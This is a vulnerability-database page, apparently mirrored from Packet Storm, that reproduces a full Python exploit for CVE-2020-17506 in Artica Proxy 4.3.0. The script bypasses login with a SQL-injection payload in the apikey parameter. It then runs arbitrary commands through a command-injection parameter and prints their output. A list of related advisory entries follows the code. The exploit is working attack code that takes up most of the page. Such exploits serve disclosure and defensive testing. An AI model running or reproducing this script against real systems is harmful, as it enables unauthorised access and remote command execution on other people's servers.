Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDan DuffyPACKETSTORM:158868
HistoryAug 14, 2020 - 12:00 a.m.

Artica Proxy 4.3.0 Authentication Bypass

2020-08-1400:00:00
Dan Duffy
packetstormsecurity.com
129
JSON
`# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass  
# Google Dork: N/A  
# Date: 2020-08-13  
# Exploit Author: Dan Duffy  
# Vendor Homepage: http://articatech.net/  
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes  
# Version: 4.30.00000000 (REQUIRED)  
# Tested on: Debian  
# CVE : CVE-2020-17506  
  
import requests  
import argparse  
from bs4 import BeautifulSoup  
  
  
def bypass_auth(session, args):  
login_endpoint = "/fw.login.php?apikey="  
payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"  
  
print("[+] Bypassing authentication...")  
session.get(args.host + login_endpoint + payload, verify=False)  
  
return session  
  
  
def run_command(session, args):  
cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)  
print("[+] Running command: {}".format(args.command))  
response = session.post(args.host + cmd_endpoint, verify=False)  
soup = BeautifulSoup(response.text, "html.parser")  
print(soup.find_all("code")[1].get_text())  
  
  
def main():  
parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")  
parser.add_argument(  
"--host", help="The host to target. Format example: https://host:port",  
)  
parser.add_argument("--command", help="The command to run")  
  
args = parser.parse_args()  
if not args.host or not args.command:  
parser.print_help()  
exit(0)  
session = requests.Session()  
session = bypass_auth(session, args)  
  
run_command(session, args)  
  
  
if __name__ == "__main__":  
main()  
`

Related

zdt 2
nuclei 1
cve 1
prion 1
packetstorm 1
metasploit 1
rapid7blog 1
checkpoint_advisories 1
zdt
zdt
Artica Proxy 4.3.0 - Authentication Bypass Exploit
2020-08-13 00:00:00
Artica Proxy 4.30.000000 Authentication Bypass / Command Injection Exploit
2020-09-22 00:00:00
nuclei
nuclei
Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
2020-08-20 15:11:34
cve
cve
CVE-2020-17506
2020-08-12 17:15:00
prion
prion
Sql injection
2020-08-12 17:15:00
packetstorm
packetstorm
Artica Proxy 4.30.000000 Authentication Bypass / Command Injection
2020-09-22 00:00:00
metasploit
metasploit
Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection
2020-08-30 10:45:40
rapid7blog
rapid7blog
Metasploit Wrap-up
2020-09-25 18:54:14
checkpoint_advisories
checkpoint_advisories
SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465)
2020-11-18 00:00:00
JSON
Related for PACKETSTORM:158868
zdt2nuclei1cve1prion1packetstorm1metasploit1rapid7blog1checkpoint_advisories1